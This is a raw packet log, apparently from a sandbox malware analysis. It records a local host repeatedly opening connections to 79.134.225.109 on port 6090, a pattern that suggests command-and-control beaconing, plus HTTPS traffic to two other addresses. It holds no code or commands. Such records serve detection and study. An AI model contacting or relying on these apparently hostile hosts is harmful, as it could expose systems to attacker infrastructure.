Apr 1, 2021 17:42:59.273749113 CEST	49756	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:59.379173040 CEST	6090	49756	79.134.225.109	192.168.2.3
Apr 1, 2021 17:42:59.881043911 CEST	49756	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:42:59.986619949 CEST	6090	49756	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:00.490477085 CEST	49756	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:00.595977068 CEST	6090	49756	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:00.713484049 CEST	49757	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:00.819245100 CEST	6090	49757	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:01.334223032 CEST	49757	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:01.439593077 CEST	6090	49757	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:01.943689108 CEST	49757	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:02.049566031 CEST	6090	49757	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:02.164545059 CEST	49758	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:02.270781994 CEST	6090	49758	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:02.773756981 CEST	49758	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:02.878950119 CEST	6090	49758	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:03.381319046 CEST	49758	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:03.487226963 CEST	6090	49758	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:03.603231907 CEST	49759	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:03.710040092 CEST	6090	49759	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:04.225171089 CEST	49759	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:04.330393076 CEST	6090	49759	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:04.834557056 CEST	49759	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:04.942831993 CEST	6090	49759	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:05.056706905 CEST	49760	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:05.162887096 CEST	6090	49760	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:05.678376913 CEST	49760	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:05.784378052 CEST	6090	49760	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:06.462992907 CEST	49760	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:06.569077969 CEST	6090	49760	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:07.337506056 CEST	49761	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:07.443154097 CEST	6090	49761	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:07.959784985 CEST	49761	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:08.066956997 CEST	6090	49761	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:08.647558928 CEST	49761	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:08.756649017 CEST	6090	49761	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:08.884926081 CEST	49762	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:08.993985891 CEST	6090	49762	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:09.663220882 CEST	49762	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:09.771828890 CEST	6090	49762	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:10.350680113 CEST	49762	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:10.458597898 CEST	6090	49762	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:10.572236061 CEST	49763	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:10.677330017 CEST	6090	49763	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:11.350708008 CEST	49763	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:11.458153009 CEST	6090	49763	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:11.954859018 CEST	443	49743	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:11.960196018 CEST	49763	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:12.065942049 CEST	6090	49763	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:12.181907892 CEST	49764	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:12.289340019 CEST	6090	49764	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:12.850847006 CEST	49764	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:12.956736088 CEST	6090	49764	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:13.460323095 CEST	49764	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:13.567308903 CEST	6090	49764	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:13.681987047 CEST	49765	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:13.788177967 CEST	6090	49765	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:14.288441896 CEST	49765	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:14.394159079 CEST	6090	49765	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:14.897871971 CEST	49765	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:15.003232002 CEST	6090	49765	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:15.118901968 CEST	49766	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:15.224678993 CEST	6090	49766	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:15.726109982 CEST	49766	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:15.834232092 CEST	6090	49766	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:16.351154089 CEST	49766	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:16.458616018 CEST	6090	49766	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:16.573539019 CEST	49767	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:16.681027889 CEST	6090	49767	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:17.195079088 CEST	49767	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:17.303842068 CEST	6090	49767	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:17.804372072 CEST	49767	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:17.910938978 CEST	6090	49767	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:18.025995016 CEST	49768	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:18.131742001 CEST	6090	49768	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:18.632596016 CEST	49768	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:18.738984108 CEST	6090	49768	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:19.257652044 CEST	49768	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:19.367108107 CEST	6090	49768	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:19.478652954 CEST	49769	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:19.589983940 CEST	6090	49769	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:20.101429939 CEST	49769	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:20.206912041 CEST	6090	49769	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:20.710860968 CEST	49769	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:20.817989111 CEST	6090	49769	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:20.932224035 CEST	49770	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:21.040880919 CEST	6090	49770	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:21.554876089 CEST	49770	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:21.664089918 CEST	6090	49770	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:22.164136887 CEST	49770	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:22.271799088 CEST	6090	49770	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:22.384994030 CEST	49771	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:22.490967035 CEST	6090	49771	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:22.992513895 CEST	49771	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:23.098500013 CEST	6090	49771	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:23.601777077 CEST	49771	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:23.708745003 CEST	6090	49771	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:24.066526890 CEST	49772	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:24.173676968 CEST	6090	49772	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:24.679979086 CEST	49772	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:24.785717010 CEST	6090	49772	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:25.289418936 CEST	49772	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:25.394578934 CEST	6090	49772	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:25.516961098 CEST	49773	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:25.622901917 CEST	6090	49773	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:26.127383947 CEST	49773	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:26.235646009 CEST	6090	49773	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:26.742779970 CEST	49773	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:26.849512100 CEST	6090	49773	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:26.981268883 CEST	49774	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:27.089162111 CEST	6090	49774	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:27.602091074 CEST	49774	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:27.714091063 CEST	6090	49774	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:28.227230072 CEST	49774	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:28.338304996 CEST	6090	49774	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:28.448438883 CEST	49775	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:28.557039022 CEST	6090	49775	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:29.070930004 CEST	49775	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:29.179192066 CEST	6090	49775	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:29.680346012 CEST	49775	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:29.791424990 CEST	6090	49775	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:29.901120901 CEST	49776	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:30.009465933 CEST	6090	49776	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:30.524173021 CEST	49776	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:30.629942894 CEST	6090	49776	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:31.133621931 CEST	49776	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:31.239439964 CEST	6090	49776	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:31.355357885 CEST	49777	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:31.461002111 CEST	6090	49777	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:31.961818933 CEST	49777	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:32.068320990 CEST	6090	49777	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:32.571284056 CEST	49777	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:32.619405985 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:43:32.619436979 CEST	49704	443	192.168.2.3	116.203.34.79
Apr 1, 2021 17:43:32.677470922 CEST	6090	49777	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:32.792171001 CEST	49778	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:32.897981882 CEST	6090	49778	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:33.399405956 CEST	49778	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:33.505362988 CEST	6090	49778	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:34.008908033 CEST	49778	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:34.115807056 CEST	6090	49778	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:34.229849100 CEST	49779	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:34.338258028 CEST	6090	49779	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:34.852686882 CEST	49779	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:34.957956076 CEST	6090	49779	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:35.462150097 CEST	49779	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:35.569660902 CEST	6090	49779	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:35.697227001 CEST	49780	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:35.805326939 CEST	6090	49780	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:36.305947065 CEST	49780	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:36.412014961 CEST	6090	49780	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:36.915361881 CEST	49780	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:37.021981001 CEST	6090	49780	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:37.136260986 CEST	49781	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:37.240926981 CEST	6090	49781	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:37.743536949 CEST	49781	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:37.850977898 CEST	6090	49781	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:38.353008986 CEST	49781	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:38.458971977 CEST	6090	49781	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:38.573801041 CEST	49782	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:38.679481030 CEST	6090	49782	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:39.181180954 CEST	49782	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:39.287256956 CEST	6090	49782	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:39.790636063 CEST	49782	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:39.897444010 CEST	6090	49782	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:40.011734962 CEST	49783	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:40.121481895 CEST	6090	49783	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:40.634413958 CEST	49783	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:40.742901087 CEST	6090	49783	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:41.337599993 CEST	49783	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:41.443228960 CEST	6090	49783	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:41.858665943 CEST	49784	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:41.967669010 CEST	6090	49784	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:42.540895939 CEST	49784	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:42.648210049 CEST	6090	49784	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:43.244018078 CEST	49784	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:43.350399971 CEST	6090	49784	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:43.464793921 CEST	49785	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:43.570482969 CEST	6090	49785	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:44.244158030 CEST	49785	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:44.351978064 CEST	6090	49785	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:44.931672096 CEST	49785	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:45.038384914 CEST	6090	49785	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:45.153419971 CEST	49786	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:45.260384083 CEST	6090	49786	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:45.931700945 CEST	49786	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:46.039099932 CEST	6090	49786	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:46.545885086 CEST	49786	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:46.651632071 CEST	6090	49786	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:46.823961973 CEST	49787	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:46.929933071 CEST	6090	49787	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:47.436414957 CEST	49787	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:47.546644926 CEST	6090	49787	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:48.144175053 CEST	49787	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:48.249435902 CEST	6090	49787	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:48.521313906 CEST	49788	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:48.626877069 CEST	6090	49788	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:49.136811972 CEST	49788	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:49.242825031 CEST	6090	49788	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:49.834175110 CEST	49788	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:49.940181017 CEST	6090	49788	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:50.070511103 CEST	49789	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:50.179517984 CEST	6090	49789	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:50.838452101 CEST	49789	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:50.947650909 CEST	6090	49789	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:51.465219975 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.526051998 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.529128075 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.539422035 CEST	49789	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:51.597404957 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.648895025 CEST	6090	49789	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:51.657694101 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.659172058 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.659208059 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.659224987 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.659291029 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.685700893 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.746311903 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.746447086 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.768179893 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.771347046 CEST	49791	6090	192.168.2.3	79.134.225.109
Apr 1, 2021 17:43:51.833857059 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833884001 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833905935 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833930969 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833944082 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.833954096 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833977938 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.833980083 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.834000111 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.834022999 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.834033966 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.834045887 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.834068060 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.834717035 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.881521940 CEST	6090	49791	79.134.225.109	192.168.2.3
Apr 1, 2021 17:43:51.894289017 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894314051 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894330025 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894351006 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894418955 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894418955 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.894434929 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894450903 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894467115 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894474030 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.894503117 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.894529104 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894546032 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894562006 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894577026 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894882917 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.894906998 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894931078 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894953012 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.894973040 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.895034075 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.895040989 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.895065069 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.895087957 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.895301104 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.897512913 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.897614956 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954679966 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954720020 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954754114 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954782963 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954813004 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954827070 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954837084 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954868078 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954876900 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954894066 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954910994 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954916954 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954942942 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954943895 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954971075 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.954988956 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.954993010 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955018044 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955048084 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955048084 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955075979 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955080986 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955112934 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955117941 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955137968 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955162048 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955168962 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955194950 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955204010 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955215931 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955244064 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955246925 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955274105 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955288887 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955298901 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955327034 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955329895 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955354929 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955378056 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955380917 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955405951 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955423117 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955430031 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955455065 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955480099 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955481052 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955507994 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955509901 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955555916 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955573082 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955600977 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955611944 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955627918 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955647945 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955651999 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955687046 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.955935001 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955957890 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.955984116 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.956819057 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.958152056 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.958175898 CEST	443	49790	185.81.0.109	192.168.2.3
Apr 1, 2021 17:43:51.958226919 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:51.958266973 CEST	49790	443	192.168.2.3	185.81.0.109
Apr 1, 2021 17:43:52.017890930 CEST	443	49790	185.81.0.109	192.168.2.3
